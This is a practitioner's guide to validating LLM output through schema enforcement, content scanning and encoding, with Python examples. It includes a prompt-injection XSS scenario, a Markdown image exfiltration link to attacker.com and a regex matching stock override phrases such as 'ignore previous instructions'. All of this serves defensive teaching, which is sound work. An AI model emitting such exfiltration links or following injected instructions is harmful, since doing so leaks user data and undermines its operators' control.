LLM Output Validation Patterns: Structured Outputs, Schema Enforcement, and Content Filtering

Series: AI Security in Practice
Pillar 3: Defend and Harden
Difficulty: Intermediate
Author: Paul Lawlor
Date: 11 March 2026
Reading time: 14 minutes

A practitioner’s guide to the three layers of LLM output validation: constrained decoding for structural guarantees, post-generation validation for content safety, and context-aware encoding for downstream protection.


  1. The problem: why LLM output is untrusted
  2. How output validation works
  3. A taxonomy of output validation patterns
  4. Worked examples
  5. Detection and defence in depth
  6. Limitations and open problems
  7. Practical recommendations
  8. Further reading

1. The problem: why LLM output is untrusted

A financial services firm deploys an internal chatbot that answers employee questions about company policy. The chatbot retrieves documents from a knowledge base, passes them to a large language model, and renders the response in a web dashboard. Six weeks after launch, a penetration tester discovers that by embedding a crafted instruction in a policy document stored in the knowledge base, they can make the chatbot return a response containing a <script> tag. The dashboard renders it. The tester now has cross-site scripting in an internal tool that handles HR and compliance queries.

This is not a theoretical scenario. It is the exact class of vulnerability described in OWASP LLM05:2025 Improper Output Handling: “insufficient validation, sanitization, and handling of the outputs generated by large language models before they are passed downstream to other components and systems.” 1 The consequences range from XSS and CSRF in web browsers to SSRF, privilege escalation, and remote code execution on backend systems. 1

The core issue is that LLM output is structurally indistinguishable from user input. A model does not have a privileged output channel that guarantees safety. It generates tokens based on statistical patterns, and those tokens can contain anything: valid JSON, malformed JSON, SQL injection payloads, JavaScript, Markdown image exfiltration links, or fabricated data that looks plausible. When an application passes this output directly to a database query, a shell command, an HTML template, or another LLM in an agentic chain, the model’s response becomes an attack vector.

Three categories of output failure create security risk:

Structural failures. The model returns data in an unexpected format. An API that expects JSON receives free-form text, or JSON with missing fields, wrong types, or extra properties. Downstream parsers crash or fall back to unsafe defaults. In agentic systems where one model’s output feeds another model’s input, a single malformed response can cascade through the chain.

Content injection. The model’s response contains executable content that the application treats as trusted: script tags, SQL fragments, shell commands, or Markdown that triggers unintended rendering. This is the classic output handling vulnerability. Since LLM output can be influenced by prompt injection (both direct and indirect), an attacker does not need to control the model directly. They need only to place malicious instructions in a document, email, or web page that the model processes. 2

Information leakage. The model includes personally identifiable information (PII), API keys, internal system details, or confidential business data in its response. Even if the model was not trained on this data, retrieval-augmented generation (RAG) pipelines can surface it from the knowledge base, and the model may include it in the response without any awareness that it should be redacted. 3

Output validation is the practice of treating every LLM response as untrusted input and applying structured verification before it reaches any downstream system or user interface. It is not optional. It is the output equivalent of input validation, and in LLM applications it is arguably more important, because the model’s output surface is richer and less predictable than a web form.


2. How output validation works

Output validation for LLM applications operates at two distinct levels: constraining what the model can generate, and verifying what it did generate. These are complementary, not interchangeable.

Constrained decoding: enforcement at generation time

The strongest form of output validation prevents invalid output from ever being produced. Constrained decoding modifies the model’s token sampling process so that only tokens consistent with a target schema can be selected at each step. The provider compiles a JSON Schema into a grammar and masks out tokens that would violate the schema before sampling. 4

OpenAI introduced this as Structured Outputs in August 2024. When you set response_format with a JSON Schema and strict: true, or set strict: true on a function definition, the model is constrained to produce output that exactly matches the schema. OpenAI reports 100% schema conformance on their evaluation suite, compared to under 40% with unconstrained generation and prompting alone. 4 Anthropic followed in late 2025, releasing constrained decoding for Claude models via the output_config.format parameter and strict: true on tool definitions. 5 Google’s Gemini API offers a similar response_schema parameter. 6
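In raw HTTP terms, the request that enables strict mode has roughly this shape. The schema and field names below are illustrative, not from any particular application:

```python
# Illustrative request body for OpenAI-style Structured Outputs.
# The wrapper keys (response_format, json_schema, strict) follow OpenAI's
# documented API; the schema contents are example choices.
policy_schema = {
    "type": "object",
    "properties": {
        "answer": {"type": "string"},
        "confidence": {"type": "number"},
    },
    "required": ["answer", "confidence"],
    "additionalProperties": False,  # no extraneous fields
}

request_body = {
    "model": "gpt-4o",
    "messages": [
        {"role": "user", "content": "Summarise the retention policy."}
    ],
    "response_format": {
        "type": "json_schema",
        "json_schema": {
            "name": "policy_answer",
            "strict": True,  # enables constrained decoding
            "schema": policy_schema,
        },
    },
}
```

The provider compiles `policy_schema` into a grammar at generation time; without `strict: true` the schema is merely advisory.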

Constrained decoding guarantees structural validity: correct field names, correct types, required fields present, no extraneous properties. It does not guarantee semantic safety. A model can produce a perfectly valid JSON object where a summary field contains a script injection payload, or a recommendation field contains fabricated data. Schema conformance is necessary but not sufficient.

Post-generation validation: verification after the fact

Post-generation validation treats the model’s output as untrusted input and runs it through a validation pipeline before passing it downstream. This is where libraries like Instructor, Guardrails AI, and LLM Guard operate.

The typical pipeline has three stages:

  1. Parse and validate structure. Deserialise the response into a typed object. Verify that it matches the expected schema, including field types, value ranges, enum constraints, and string formats. If it fails, either reject the response or retry with error context sent back to the model.

  2. Validate content. Run domain-specific checks on the parsed values. Does the email field contain a valid email? Does the sql_query field contain only SELECT statements? Does the summary field contain any HTML tags, script elements, or Markdown image links? Does it contain PII that should be redacted?

  3. Encode and sanitise for context. Apply output encoding appropriate to the downstream consumer. HTML-encode for web rendering. Parameterise for SQL. Escape for shell commands. This is the same context-aware encoding that web application security has practised for decades, applied to a new source of untrusted content. 7
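The three stages can be sketched with the standard library alone. The expected fields and the markup check below are illustrative placeholders for real business rules:

```python
import html
import json

# Illustrative schema: field names and types stand in for real business rules.
EXPECTED_FIELDS = {"summary": str, "confidence": float}

def validate_llm_response(raw: str) -> str:
    # Stage 1: parse and validate structure.
    data = json.loads(raw)  # raises ValueError on malformed JSON
    for field, ftype in EXPECTED_FIELDS.items():
        if field not in data or not isinstance(data[field], ftype):
            raise ValueError(f"missing or mistyped field: {field}")
    # Stage 2: validate content (here: a crude rejection of markup).
    if "<" in data["summary"] and ">" in data["summary"]:
        raise ValueError("summary contains markup")
    # Stage 3: encode for the destination (web rendering, in this sketch).
    return html.escape(data["summary"])
```

Stage 3 runs even though stage 2 already rejected markup: encoding is deliberately redundant with content checks, which is the point of layering.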

A common mistake is to assume that structured outputs from the API eliminate the need for post-generation validation. They do not. Constrained decoding solves the structural problem: you will always get valid JSON with the right shape. But within those correctly typed fields, the content remains model-generated and unpredictable. A string field can contain anything that is a valid string, including injection payloads.

The reverse mistake is equally dangerous: relying only on post-generation validation without requesting structured output. If the model returns free-form text when you expected JSON, your parser fails before validation even begins. Regex-based extraction from free-form responses is fragile and error-prone.

The robust pattern is to use both: constrained decoding to guarantee structure, and post-generation validation to verify content. This defence-in-depth approach mirrors the layered security model that OWASP recommends for LLM applications. 1


3. A taxonomy of output validation patterns

Output validation patterns fall into three layers. Each addresses a different class of risk, and production systems typically need all three.

Layer 1: Schema enforcement (structural guarantees)

Schema enforcement ensures the model’s response conforms to a predefined data structure. This layer prevents parsing failures, type errors, and unexpected fields from propagating downstream.

Provider-native structured outputs. OpenAI, Anthropic, and Google now offer constrained decoding at the API level. You supply a JSON Schema, and the model is physically constrained to produce conforming output. This is the most reliable structural guarantee available because it operates during token generation, not after. 4 5

Client-side schema validation with Instructor. The Instructor library patches LLM client SDKs to accept a Pydantic model as a response_model parameter. It sends the schema to the model, parses the response, validates it against the Pydantic model, and automatically retries with error feedback if validation fails. 8 This works with providers that support function calling or structured outputs, including OpenAI, Anthropic, Google, Mistral, and local models via Ollama. Instructor handles the retry loop, so you write a Pydantic model and get a typed, validated object back.

Guardrails AI. The Guardrails AI framework takes a different approach: you define a Guard with a set of validators, and the framework runs each validator against the model’s output. Validators can check structure (JSON schema, regex patterns, field lengths) and content (PII detection, toxicity, hallucination). Failed validations trigger configurable actions: fix, reask, filter, refrain, or raise an exception. 9

Layer 2: Content validation (semantic safety)

Content validation inspects the values within a structurally valid response. A JSON object with correct types can still contain dangerous or inappropriate content.

Regex and pattern matching. The simplest content validators use regular expressions to detect known-bad patterns: <script> tags, SQL keywords in unexpected fields, shell metacharacters, Markdown image links with external URLs. These are fast, deterministic, and easy to audit. They catch obvious injections but miss obfuscated variants.

PII detection and redaction. Libraries like LLM Guard and Presidio (from Microsoft) scan text for personally identifiable information: names, email addresses, phone numbers, national insurance numbers, credit card numbers. LLM Guard’s Sensitive output scanner uses named-entity recognition models and regex patterns to detect and redact PII before it reaches the user. 10 This is critical for RAG applications where the knowledge base may contain personal data that the model surfaces in its response.

Factual consistency and grounding. LLM Guard’s FactualConsistency scanner compares the model’s response against the provided context to detect hallucination. 10 AWS Bedrock Guardrails offers a similar contextual grounding check that evaluates whether the response is grounded in the source documents. 11 These checks reduce the risk of the model fabricating information, though they are not foolproof.

Toxicity and bias detection. Content classifiers evaluate whether the response contains hate speech, insults, sexual content, violence, or other harmful material. LLM Guard provides Toxicity and Bias output scanners. 10 Bedrock Guardrails offers configurable content filters with adjustable severity thresholds (None, Low, Medium, High) across six categories. 11

Layer 3: Context-aware encoding (downstream protection)

Even after structural and content validation, the output must be encoded appropriately for its destination. This is the final defence layer, and it mirrors decades of web application security practice.

HTML encoding for content rendered in browsers. Prevents XSS from any content that passed earlier filters.

SQL parameterisation for content used in database queries. Never concatenate LLM output into SQL strings, regardless of what content validation you performed.

Shell escaping for content passed to system commands. Better yet, avoid passing LLM output to shell commands entirely.

JSON serialisation for content passed to APIs. Use proper serialisation libraries rather than string interpolation.

This layer is not specific to LLMs. It is the same output encoding that the OWASP Application Security Verification Standard (ASVS) Section 5 prescribes for all untrusted input. 7 The difference is that with LLMs, the untrusted input comes from your own application’s AI component rather than from an external user.


4. Worked examples

The following examples demonstrate each validation layer in practice. All use Python and assume you have the relevant packages installed.

Example 1: OpenAI Structured Outputs with strict mode

This example requests a structured response from OpenAI and gets a schema-guaranteed JSON object back. No parsing or retry logic is required.

from openai import OpenAI
from pydantic import BaseModel

client = OpenAI()

class PolicyAnswer(BaseModel):
    question: str
    answer: str
    confidence: float
    sources: list[str]

completion = client.beta.chat.completions.parse(
    model="gpt-4o",
    messages=[
        {"role": "system", "content": "Answer policy questions. Return structured data."},
        {"role": "user", "content": "What is our data retention policy for customer PII?"},
    ],
    response_format=PolicyAnswer,
)

result = completion.choices[0].message.parsed
print(result.answer)
print(result.confidence)

The response is guaranteed to match the PolicyAnswer schema: four fields, correct types, no extra properties. If the model cannot conform, the API returns a refusal rather than malformed output. 4 This eliminates structural failures but says nothing about whether the answer field contains safe content.

Example 2: Instructor with Pydantic validation

Instructor adds automatic retry with error feedback. Here the Pydantic model includes field validators that enforce content constraints.

import re

import instructor
from openai import OpenAI
from pydantic import BaseModel, field_validator

client = instructor.from_openai(OpenAI())

class SafeSummary(BaseModel):
    title: str
    summary: str
    risk_level: str

    @field_validator("summary")
    @classmethod
    def no_html_tags(cls, v: str) -> str:
        # Reject anything that looks like a tag before it reaches a renderer.
        if re.search(r"<[^>]+>", v):
            raise ValueError("Summary must not contain HTML tags")
        return v

    @field_validator("risk_level")
    @classmethod
    def valid_risk_level(cls, v: str) -> str:
        allowed = {"low", "medium", "high", "critical"}
        if v.lower() not in allowed:
            raise ValueError(f"risk_level must be one of {allowed}")
        return v.lower()

result = client.chat.completions.create(
    model="gpt-4o",
    response_model=SafeSummary,
    max_retries=2,
    messages=[
        {"role": "user", "content": "Summarise the vulnerability in CVE-2024-5184."}
    ],
)
print(result.summary)

If the model returns HTML in the summary or an invalid risk level, Instructor catches the Pydantic validation error, sends the error message back to the model, and retries. After max_retries attempts, it raises an exception. 8 This pattern combines structural enforcement with content-level validation in a single call.

Example 3: LLM Guard output scanners

LLM Guard runs a battery of output scanners independently of the LLM provider. This example checks for PII, toxicity, and relevance.

from llm_guard.output_scanners import Relevance, Sensitive, Toxicity

prompt = "What is our refund policy for enterprise customers?"
model_output = "Contact John Smith at john.smith@example.com for refunds over £10,000."

scanners = [
    Sensitive(entity_types=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER"], redact=True),
    Toxicity(threshold=0.7),
    Relevance(threshold=0.5),
]

sanitised_output = model_output
for scanner in scanners:
    sanitised_output, is_valid, risk_score = scanner.scan(prompt, sanitised_output)
    if not is_valid:
        print(f"Scanner {scanner.__class__.__name__} flagged output (risk: {risk_score})")

print(sanitised_output)

The Sensitive scanner detects the email address and person name, redacting them before the response reaches the user. The Toxicity scanner checks for harmful language. The Relevance scanner verifies the response is relevant to the original prompt. 10 Each scanner returns the (potentially modified) output, a validity flag, and a risk score. You chain them in sequence, and any scanner can block or modify the response.

Example 4: Context-aware output encoding

After validation, encode the output for its destination. This is the final layer.

import html
import json

def render_for_web(validated_output: str) -> str:
    # HTML-escape so any markup that slipped through earlier layers is inert.
    return html.escape(validated_output)

def render_for_api(validated_data: dict) -> str:
    # Serialise properly; never build JSON by string interpolation.
    return json.dumps(validated_data, ensure_ascii=True)

def build_query(validated_input: str, db_cursor) -> None:
    # Parameterised query: the driver handles quoting, never string concatenation.
    db_cursor.execute(
        "SELECT * FROM policies WHERE topic = %s",
        (validated_input,),
    )

These are not LLM-specific techniques. They are the same encoding practices that prevent XSS, SQL injection, and command injection in any web application. The difference is that with LLM applications, developers sometimes forget that the model’s output is untrusted input that needs the same treatment. 7


5. Detection and defence in depth

No single validation layer is sufficient. Production LLM applications need a defence-in-depth strategy that combines multiple layers, with monitoring to detect what the layers miss.

A complete output validation pipeline processes every model response through five stages:

  1. Schema enforcement. Use constrained decoding (structured outputs) at the API level to guarantee structural conformance. This eliminates parsing failures and type errors.

  2. Field-level validation. Validate individual field values against business rules using Pydantic validators, Guardrails AI validators, or custom logic. Check string lengths, numeric ranges, enum membership, date formats, and URL patterns.

  3. Content scanning. Run content-level scanners to detect PII, toxicity, bias, malicious URLs, and factual inconsistency. Tools like LLM Guard, Bedrock Guardrails, and NeMo Guardrails output rails operate at this layer. 10 11 12

  4. Context-aware encoding. Encode the validated output for its destination: HTML escaping for web rendering, parameterised queries for databases, proper serialisation for APIs. Never skip this step, even if content scanning passed.

  5. Logging and anomaly detection. Log every model response (before and after validation), every validation failure, and every modification made by scanners. Monitor for patterns that suggest exploitation attempts: repeated validation failures from the same session, outputs that consistently trigger PII redaction, or responses with unusually high risk scores.

Failure-handling strategies

When validation fails, the application must decide what to do. The options, in order of increasing risk tolerance:

Block and return a safe fallback. Replace the response with a generic message. This is the safest option and appropriate for high-risk applications (financial advice, healthcare, legal). The user sees “I cannot provide that information” rather than a potentially harmful response.

Redact and return. Remove or mask the problematic content (e.g. replace detected PII with [REDACTED]) and return the rest of the response. LLM Guard’s Sensitive scanner supports this mode. 10 This preserves useful content while removing specific risks.

Retry with feedback. Send the validation error back to the model and request a corrected response. Instructor’s retry mechanism does this automatically. 8 Set a maximum retry count (two or three) to avoid infinite loops. Be aware that retrying creates latency and cost, and there is no guarantee the model will produce a valid response on the next attempt.

Log and allow. Pass the response through but log the validation failure for review. This is appropriate only for low-risk applications where blocking would create an unacceptable user experience and the content risk is manageable. Even in this mode, context-aware encoding must still be applied.

Monitoring and metrics

Output validation generates signals that feed into your security monitoring. Key metrics to track:

  • Validation failure rate by scanner. A sudden increase in PII detections may indicate a data leak in the knowledge base. A spike in toxicity flags may indicate prompt injection attacks.
  • Redaction rate. How often are scanners modifying responses? A consistently high redaction rate suggests the model or knowledge base needs attention.
  • Retry rate. How often does Instructor or your retry logic need to re-prompt the model? Frequent retries increase cost and latency.
  • Response latency with validation. Each scanner adds latency. Monitor the total pipeline latency to ensure it remains within acceptable bounds for your users.

Alert on anomalous patterns. If a single user session triggers ten consecutive PII detections, that warrants investigation. If the model suddenly starts producing outputs that fail factual consistency checks at a higher rate, the knowledge base may have been tampered with.
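A per-session streak counter is enough to implement the "ten consecutive PII detections" alert. A minimal sketch, with an illustrative threshold:

```python
from collections import defaultdict

PII_ALERT_THRESHOLD = 10  # illustrative: consecutive detections per session

class SessionMonitor:
    """Track consecutive PII detections per session and flag anomalies."""

    def __init__(self) -> None:
        self.streaks: dict[str, int] = defaultdict(int)

    def record(self, session_id: str, pii_detected: bool) -> bool:
        """Record one response; return True if the session crosses the threshold."""
        if pii_detected:
            self.streaks[session_id] += 1
        else:
            self.streaks[session_id] = 0  # streak broken by a clean response
        return self.streaks[session_id] >= PII_ALERT_THRESHOLD
```

In production the same pattern would feed an alerting system rather than return a boolean, but the signal is identical.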


6. Limitations and open problems

Output validation significantly reduces risk, but it has hard boundaries that practitioners must understand.

Schema enforcement does not prevent semantic attacks

Constrained decoding guarantees that the model produces structurally valid output. It says nothing about what the valid values mean. A string field constrained by a JSON Schema is still a string, and a string can contain anything: a social engineering message, a convincing fabrication, or an injection payload that only becomes dangerous in the downstream context. If your schema includes a sql_query field of type string, constrained decoding will ensure the field exists and is a string. It will not prevent the string from containing DROP TABLE users;. Schema enforcement is a structural control, not a semantic one.

Content filters have false positives and false negatives

Every content scanner operates on a threshold. Set it too low, and you block legitimate responses. Set it too high, and you miss actual threats. Toxicity classifiers struggle with domain-specific language: a medical chatbot discussing “malignant” conditions or a cybersecurity tool describing attack techniques will trigger toxicity filters tuned for general conversation. PII detectors produce false positives on strings that resemble but are not PII (e.g. fictional names in examples, product codes that match phone number patterns).

False negatives are harder to measure but more dangerous. Obfuscated injection payloads (Base64-encoded scripts, Unicode homoglyphs, split across multiple fields) routinely bypass regex-based scanners. ML-based classifiers are more robust but not immune, particularly to adversarial inputs designed to evade classification. 13
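One partial mitigation is to decode common obfuscation layers before scanning. The sketch below rescans any Base64-looking substrings; it is a heuristic that extends coverage but can still be evaded:

```python
import base64
import re

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)
# Heuristic: runs of Base64 alphabet long enough to be worth decoding.
B64_CANDIDATE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def contains_script(text: str) -> bool:
    """Check the text, and any decodable Base64 substrings, for script tags."""
    if SCRIPT_TAG.search(text):
        return True
    for candidate in B64_CANDIDATE.findall(text):
        try:
            decoded = base64.b64decode(candidate, validate=True).decode("utf-8", "ignore")
        except Exception:
            continue  # not valid Base64; skip
        if SCRIPT_TAG.search(decoded):
            return True
    return False
```

This catches single-layer Base64 but not nested encodings, homoglyphs, or payloads split across fields, which is why layered controls and encoding at the destination remain necessary.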

Latency and cost

Each scanner in the validation pipeline adds processing time. Regex checks are fast (sub-millisecond). ML-based classifiers (PII detection, toxicity, factual consistency) can add tens to hundreds of milliseconds per call, depending on the model size and whether they run locally or via API. For streaming responses, output validation either requires buffering the full response before validation (which defeats the purpose of streaming) or running validators incrementally on partial content (which limits what can be checked).

LLM Guard runs locally and adds no API cost, but it requires compute. Bedrock Guardrails charges per policy type and per token evaluated. 11 At high throughput, validation costs can become a meaningful fraction of the overall inference cost. Teams should benchmark their validation pipeline and make deliberate trade-offs between coverage and latency.

Validation in agentic chains

In agentic architectures where multiple LLMs communicate, each model’s output becomes the next model’s input. Output validation must occur at every boundary in the chain, not at the final output to the user. If Agent A produces a response that contains an indirect prompt injection payload, and that response is passed directly to Agent B as context, Agent B may follow the injected instruction. Validating only the final output to the user is insufficient because the damage occurs at the intermediate step. 14

This creates an engineering challenge: every inter-agent message needs its own validation pipeline, which multiplies latency and complexity. Most agentic frameworks do not enforce this by default. Developers must build it explicitly.
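A sketch of what an explicit boundary check might look like, wrapped around every inter-agent hand-off. The injection heuristic here is deliberately crude and illustrative:

```python
import re

# Illustrative heuristic: phrases that suggest an embedded instruction.
INJECTION_HINTS = re.compile(
    r"(ignore (all |your )?previous instructions|you are now|system prompt)",
    re.IGNORECASE,
)

def guarded_handoff(message: str) -> str:
    """Validate one agent's output before it becomes another agent's input."""
    if INJECTION_HINTS.search(message):
        raise ValueError("possible injection in inter-agent message")
    return message

def run_chain(user_query: str, agents) -> str:
    # Each agent is a callable; every hand-off passes through the guard,
    # not just the final response to the user.
    payload = user_query
    for agent in agents:
        payload = guarded_handoff(agent(payload))
    return payload
```

The structural point is the placement of the guard inside the loop: validation happens at every boundary, so an injected instruction is caught before the next agent can act on it.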

The fundamental limitation is that output validation is reactive. It catches known patterns and trained-on categories. Novel attack techniques, domain-specific injection vectors, and subtle misinformation that does not trigger any classifier will pass through. Output validation reduces the attack surface; it does not eliminate it. It must be combined with input validation, least-privilege architecture, human review for high-risk decisions, and continuous red-teaming to discover what the validators miss.


7. Practical recommendations

These recommendations are ordered by impact. Start at the top and work down.

Always use structured outputs when available

If your LLM provider supports constrained decoding (OpenAI Structured Outputs, Anthropic’s JSON outputs via output_config.format or strict tool use via strict: true, Google’s response_schema), use it. Define the tightest schema you can: use enums instead of open strings where the set of valid values is known, set maxLength on string fields, mark all fields as required, and set additionalProperties: false. 4 5 This eliminates an entire class of structural failures at zero application-side cost.

If your provider does not support constrained decoding, use Instructor with a Pydantic response model and automatic retries. This is the next best option: it provides structural validation with self-correcting behaviour. 8

Add content validators for every field that reaches a user or downstream system

Do not assume that a structurally valid response is a safe response. For every field in your output schema, ask: what could go wrong if this field contained malicious content?

  • String fields rendered in HTML: validate for script tags, event handlers, and Markdown image exfiltration (![](https://attacker.com/steal?data=...)).
  • String fields used in SQL: never concatenate. Always parameterise.
  • Fields containing URLs: validate against an allowlist of domains.
  • Fields that should not contain PII: run a PII scanner (LLM Guard Sensitive, Microsoft Presidio, or regex-based checks for the specific PII types relevant to your domain). 10
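For the URL case, an allowlist check needs only the standard library; the allowed domains here are illustrative:

```python
from urllib.parse import urlparse

ALLOWED_DOMAINS = {"docs.example.com", "intranet.example.com"}  # illustrative

def url_allowed(url: str) -> bool:
    """Accept only http(s) URLs whose host is on the allowlist."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False  # rejects javascript:, data:, file:, etc.
    return parsed.hostname in ALLOWED_DOMAINS
```

Checking the scheme first matters: an allowlist on hostname alone would not stop `javascript:` or `data:` URLs, which have no hostname but are still dangerous when rendered as links.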

Implement PII scanning on every RAG application

RAG pipelines retrieve documents that may contain personal data. The model often includes that data in its response. Unless you are certain your knowledge base is fully anonymised (and can prove it under audit), scan every output for PII and redact before returning to the user. LLM Guard’s Sensitive scanner, configured with the entity types relevant to your jurisdiction (names, emails, phone numbers, national insurance numbers, postcodes), is a practical starting point. 10

Apply context-aware encoding everywhere

Treat LLM output with the same rigour you apply to user input in a web application. Use html.escape() for web rendering. Use parameterised queries for databases. Use proper serialisation for API responses. This is not optional, and it is not redundant with content validation. Content validators check for known-bad patterns; output encoding neutralises anything that slipped through. 7

Instrument the pipeline before launch

Before your application reaches production, instrument the validation pipeline to log:

  • Every validation failure, including which scanner flagged it and what the original content was.
  • Every output modification (redactions, substitutions).
  • Aggregate metrics: failure rate, redaction rate, retry rate, and validation latency.

Set alerts on anomalous spikes. A sudden increase in PII detections may mean your knowledge base has been updated with unredacted data. A spike in toxicity flags may indicate a prompt injection campaign.

Validate at every boundary in agentic chains

If your architecture involves multiple LLMs or agents communicating, apply output validation at every boundary, not at the final output to the user. Each agent’s response is untrusted input to the next agent. This is more expensive than validating once, but intermediate injection is one of the most dangerous attack vectors in agentic systems. 14

Test your validators with adversarial inputs

Include output validation in your red-teaming process. Feed your validation pipeline with known injection payloads (OWASP testing guides, prompt injection datasets, XSS payloads from the PayloadsAllTheThings repository) and verify that your scanners catch them. Test with obfuscated variants: Base64 encoding, Unicode substitution, payload splitting across fields. If your validators pass adversarial testing, increase confidence. If they fail, tighten thresholds or add additional scanners.


8. Further reading

Standards and frameworks:

  • OWASP Top 10 for LLM Applications (2025), particularly LLM05: Improper Output Handling. 1
  • OWASP Application Security Verification Standard (ASVS) v4, Section 5: Validation, Sanitization and Encoding. 7
  • NIST AI 100-2e2023: Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations. 15

Tools:

  • Instructor (Python, TypeScript, Go, Ruby): structured LLM output extraction with Pydantic validation and automatic retries. 8
  • LLM Guard (Python): input and output scanners for PII, toxicity, bias, relevance, and factual consistency. 10
  • Guardrails AI (Python): validator framework with a hub of community-contributed validators. 9
  • NeMo Guardrails (Python): programmable guardrails using Colang, with five rail types including output rails. 12
  • Microsoft Presidio: PII detection and anonymisation for text and images. 16
  • Amazon Bedrock Guardrails: managed content filtering, PII detection, and contextual grounding for Bedrock models. 11

Research:

  • Greshake et al., “Not What You’ve Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection,” arXiv:2302.12173. Demonstrates how indirect prompt injection in retrieved documents can control model output. 14
  • Zou et al., “Universal and Transferable Adversarial Attacks on Aligned Language Models,” arXiv:2307.15043. Shows that adversarial suffixes can bypass safety alignment, underscoring why output validation cannot rely on model behaviour alone. 13

References:


  1. OWASP, “LLM05:2025 Improper Output Handling,” OWASP Top 10 for LLM Applications, 2025. https://genai.owasp.org/llmrisk/llm052025-improper-output-handling/

  2. OWASP, “LLM01:2025 Prompt Injection,” OWASP Top 10 for LLM Applications, 2025. https://genai.owasp.org/llmrisk/llm01-prompt-injection/

  3. OWASP, “LLM02:2025 Sensitive Information Disclosure,” OWASP Top 10 for LLM Applications, 2025. https://genai.owasp.org/llmrisk/llm022025-sensitive-information-disclosure/

  4. OpenAI, “Introducing Structured Outputs in the API,” August 2024. https://openai.com/index/introducing-structured-outputs-in-the-api

  5. Anthropic, “Structured Outputs,” Claude API Documentation, 2025. https://docs.anthropic.com/en/docs/build-with-claude/structured-outputs

  6. Google, “Structured Output,” Gemini API Documentation, 2025. https://ai.google.dev/gemini-api/docs/structured-output

  7. OWASP, “ASVS v4 – Section 5: Validation, Sanitization and Encoding,” 2021. https://owasp-aasvs4.readthedocs.io/en/latest/V5.html

  8. Jason Liu, “Instructor: Structured LLM Outputs,” 2024. https://python.useinstructor.com/

  9. Guardrails AI, “Validators,” 2024. https://guardrailsai.com/docs/concepts/validators/

  10. Protect AI, “LLM Guard: The Security Toolkit for LLM Interactions,” 2024. https://protectai.github.io/llm-guard/

  11. AWS, “Amazon Bedrock Guardrails,” 2024. https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails.html

  12. NVIDIA, “NeMo Guardrails,” 2024. https://github.com/NVIDIA/NeMo-Guardrails

  13. Zou et al., “Universal and Transferable Adversarial Attacks on Aligned Language Models,” arXiv:2307.15043, 2023. https://arxiv.org/abs/2307.15043

  14. Greshake et al., “Not What You’ve Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection,” arXiv:2302.12173, 2023. https://arxiv.org/abs/2302.12173

  15. NIST, “Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations,” NIST AI 100-2e2023, 2024. https://nvlpubs.nist.gov/nistpubs/ai/NIST.AI.100-2e2023.pdf

  16. Microsoft, “Presidio: Data Protection and De-identification SDK,” 2024. https://microsoft.github.io/presidio/